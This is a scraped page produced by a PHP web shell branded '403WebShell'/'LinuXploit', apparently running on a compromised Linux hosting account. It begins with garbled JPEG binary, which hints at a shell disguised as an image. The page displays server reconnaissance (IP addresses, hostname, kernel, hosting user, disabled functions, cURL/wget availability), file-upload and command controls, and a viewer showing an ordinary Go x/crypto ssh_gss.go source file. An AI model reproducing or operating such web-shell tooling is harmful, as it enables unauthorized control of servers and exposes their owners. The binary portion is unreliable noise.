JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 185.124.137.255  /  Your IP : 216.73.217.6
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/go/pkg/mod/golang.org/x/crypto@v0.31.0/ssh/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/go/pkg/mod/golang.org/x/crypto@v0.31.0/ssh/ssh_gss.go
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

package ssh

import (
	"encoding/asn1"
	"errors"
)

var krb5OID []byte

func init() {
	krb5OID, _ = asn1.Marshal(krb5Mesh)
}

// GSSAPIClient provides the API to plug-in GSSAPI authentication for client logins.
type GSSAPIClient interface {
	// InitSecContext initiates the establishment of a security context for GSS-API between the
	// ssh client and ssh server. Initially the token parameter should be specified as nil.
	// The routine may return a outputToken which should be transferred to
	// the ssh server, where the ssh server will present it to
	// AcceptSecContext. If no token need be sent, InitSecContext will indicate this by setting
	// needContinue to false. To complete the context
	// establishment, one or more reply tokens may be required from the ssh
	// server;if so, InitSecContext will return a needContinue which is true.
	// In this case, InitSecContext should be called again when the
	// reply token is received from the ssh server, passing the reply
	// token to InitSecContext via the token parameters.
	// See RFC 2743 section 2.2.1 and RFC 4462 section 3.4.
	InitSecContext(target string, token []byte, isGSSDelegCreds bool) (outputToken []byte, needContinue bool, err error)
	// GetMIC generates a cryptographic MIC for the SSH2 message, and places
	// the MIC in a token for transfer to the ssh server.
	// The contents of the MIC field are obtained by calling GSS_GetMIC()
	// over the following, using the GSS-API context that was just
	// established:
	//  string    session identifier
	//  byte      SSH_MSG_USERAUTH_REQUEST
	//  string    user name
	//  string    service
	//  string    "gssapi-with-mic"
	// See RFC 2743 section 2.3.1 and RFC 4462 3.5.
	GetMIC(micFiled []byte) ([]byte, error)
	// Whenever possible, it should be possible for
	// DeleteSecContext() calls to be successfully processed even
	// if other calls cannot succeed, thereby enabling context-related
	// resources to be released.
	// In addition to deleting established security contexts,
	// gss_delete_sec_context must also be able to delete "half-built"
	// security contexts resulting from an incomplete sequence of
	// InitSecContext()/AcceptSecContext() calls.
	// See RFC 2743 section 2.2.3.
	DeleteSecContext() error
}

// GSSAPIServer provides the API to plug in GSSAPI authentication for server logins.
type GSSAPIServer interface {
	// AcceptSecContext allows a remotely initiated security context between the application
	// and a remote peer to be established by the ssh client. The routine may return a
	// outputToken which should be transferred to the ssh client,
	// where the ssh client will present it to InitSecContext.
	// If no token need be sent, AcceptSecContext will indicate this
	// by setting the needContinue to false. To
	// complete the context establishment, one or more reply tokens may be
	// required from the ssh client. if so, AcceptSecContext
	// will return a needContinue which is true, in which case it
	// should be called again when the reply token is received from the ssh
	// client, passing the token to AcceptSecContext via the
	// token parameters.
	// The srcName return value is the authenticated username.
	// See RFC 2743 section 2.2.2 and RFC 4462 section 3.4.
	AcceptSecContext(token []byte) (outputToken []byte, srcName string, needContinue bool, err error)
	// VerifyMIC verifies that a cryptographic MIC, contained in the token parameter,
	// fits the supplied message is received from the ssh client.
	// See RFC 2743 section 2.3.2.
	VerifyMIC(micField []byte, micToken []byte) error
	// Whenever possible, it should be possible for
	// DeleteSecContext() calls to be successfully processed even
	// if other calls cannot succeed, thereby enabling context-related
	// resources to be released.
	// In addition to deleting established security contexts,
	// gss_delete_sec_context must also be able to delete "half-built"
	// security contexts resulting from an incomplete sequence of
	// InitSecContext()/AcceptSecContext() calls.
	// See RFC 2743 section 2.2.3.
	DeleteSecContext() error
}

var (
	// OpenSSH supports Kerberos V5 mechanism only for GSS-API authentication,
	// so we also support the krb5 mechanism only.
	// See RFC 1964 section 1.
	krb5Mesh = asn1.ObjectIdentifier{1, 2, 840, 113554, 1, 2, 2}
)

// The GSS-API authentication method is initiated when the client sends an SSH_MSG_USERAUTH_REQUEST
// See RFC 4462 section 3.2.
type userAuthRequestGSSAPI struct {
	N    uint32
	OIDS []asn1.ObjectIdentifier
}

func parseGSSAPIPayload(payload []byte) (*userAuthRequestGSSAPI, error) {
	n, rest, ok := parseUint32(payload)
	if !ok {
		return nil, errors.New("parse uint32 failed")
	}
	s := &userAuthRequestGSSAPI{
		N:    n,
		OIDS: make([]asn1.ObjectIdentifier, n),
	}
	for i := 0; i < int(n); i++ {
		var (
			desiredMech []byte
			err         error
		)
		desiredMech, rest, ok = parseString(rest)
		if !ok {
			return nil, errors.New("parse string failed")
		}
		if rest, err = asn1.Unmarshal(desiredMech, &s.OIDS[i]); err != nil {
			return nil, err
		}

	}
	return s, nil
}

// See RFC 4462 section 3.6.
func buildMIC(sessionID string, username string, service string, authMethod string) []byte {
	out := make([]byte, 0, 0)
	out = appendString(out, sessionID)
	out = append(out, msgUserAuthRequest)
	out = appendString(out, username)
	out = appendString(out, service)
	out = appendString(out, authMethod)
	return out
}

Youez - 2016 - github.com/yon3zu
LinuXploit